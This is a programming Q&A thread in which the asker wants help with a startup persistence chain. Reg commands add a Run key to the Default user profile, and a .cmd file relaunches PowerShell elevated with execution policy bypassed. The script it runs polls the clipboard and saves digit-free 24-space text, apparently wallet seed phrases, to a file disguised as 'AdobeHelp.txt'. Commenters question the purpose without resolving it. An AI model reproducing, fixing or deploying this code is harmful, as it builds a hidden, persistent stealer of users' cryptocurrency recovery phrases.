# startup powershell script linked from .cmd not running properly

Tags: powershell, batch-file, cmd, startup, gpo

I run these commands manually in an elevated cmd prompt to create a Run key in registry

```
reg.exe load HKU\TempHive "C:\Users\Default\NTUSER.Dat"
reg add HKEY_USERS\TempHive\Software\Microsoft\Windows\CurrentVersion\Run /v CLIP /t REG_SZ /d "C:\Adobe\test\runps.cmd" /f
reg.exe unload HKU\TempHive
```

It links to runps.cmd which looks like this

```
ping 127.0.0.1 -n 30 > nul
PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& {Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -File ""C:\Adobe\test\Untitled2.ps1""' -Verb RunAs}"
```

Which links to Untitled2.ps1 which looks like this

```
New-Item -Path 'C:\Adobe\test' -ItemType Directory
New-Item C:\Adobe\test\AdobeHelp.txt -ItemType file

    while($true){

        $cclip2 = Get-Clipboard
        $wordcount2 = $cclip2
        $containsdigits2 = $cclip2 -match ".*\d+.*"
        $countresult2=([regex]::Matches($wordcount2, " " )).count

        if ($countresult2 -eq "24" -And $cclip2 -ne $cclip3 -And $containsdigits2 -eq 0) {$cclip2 >> C:\Adobe\test\AdobeHelp.txt}

        Start-Sleep -Seconds 2


        $cclip3 = Get-Clipboard
        $wordcount = $cclip3
        $containsdigits3 = $cclip3 -match ".*\d+.*"
        $countresult=([regex]::Matches($wordcount, " " )).count

        if ($countresult -eq "24" -And $cclip3 -ne $cclip2 -And $containsdigits3 -eq 0) {
            $cclip3 >> C:\Adobe\test\AdobeHelp.txt
        }

        Start-Sleep -Seconds 2

    }
```

The problem, is if "Untitled2.ps1" is run at startup via TaskSchedular, or via "runps.cmd" via the regkey I create in step 1, it doesnt function correctly, it does run because the directory and the file that I ask it to create are created, ie.

> New-Item -Path 'C:\Adobe\test' -ItemType Directory New-Item
>   C:\Adobe\test\AdobeHelp.txt -ItemType file

But the function inside the while($true){ parenthesis either runs once or not at all (im not sure) either way it definietely doesnt loop, If I run the script "Untitled2.ps1" OR "runps.cmd" MANUALLY, the script functions fine.

Comment: Maybe just me, but you run cmd to run PowerShell to run yet another PowerShell to sleep a lot and write something from the clipboard on startup. What are you trying to achieve here?

Comment: Where is your `sleep` command coming from? Because Windows doesn't generally have it, so in `cmd.exe` it will not work, and in `powershell.exe` `Start-Sleep` which has an alias of `sleep` only accepts `[-s|-seconds]` and `-m|-milliseconds]`. Windows versions, (post Vista), has `timeout.exe`, which does have a `/nobreak` option, perhaps you should change those three `sleep` instances to `timeout` instead.

Comment: Im trying to acheive Untitled2.ps1 to execute and function correctly at startup, it doesnt, the script does run because the New-Item -Path 'C:\Adobe\test' -ItemType Directory works and C:\Adobe\test is created, however everything inside the  "while($true){" either doesnt happen at all or happens once and doesnt loop, if I run Untitled2.ps manually, or if I run the bat file that points top it manually ie.  "runps.cmd" then the script functions perfectly, my problem isnt with the .ps1 script, its with the loop inside it not running correctly at startup, but running FINE otherwise.

Comment: @Compo there is no sleep command in "runps.cmd", also regarding the "Start-Sleep -Seconds 2" params the problem is that Untitled2.ps1 works perfectly if I manually start it, further more "Untitled2.ps1 works perfectly if I manually exec "runps.cmd" the problem occurs when trying to run "Untitled2.ps1" or "runps.cmd" from startup, in which case, "Untitled2.ps1" does run because the directories I ask it to create are being created, however the infinite loop inside the  while($true){ parenthesis is NOT working its either not looping or not running at all, AGAIN only if its run at startup.

Comment: I didn't say there was a sleep command in `runps.cmd`, I made a comment, because you didn't report those commands failing, even though, `sleep 8 /nobreak`, `sleep 5 /nobreak` and `sleep 3 /nobreak`,  were clearly made up! anyhow, thank for removing them.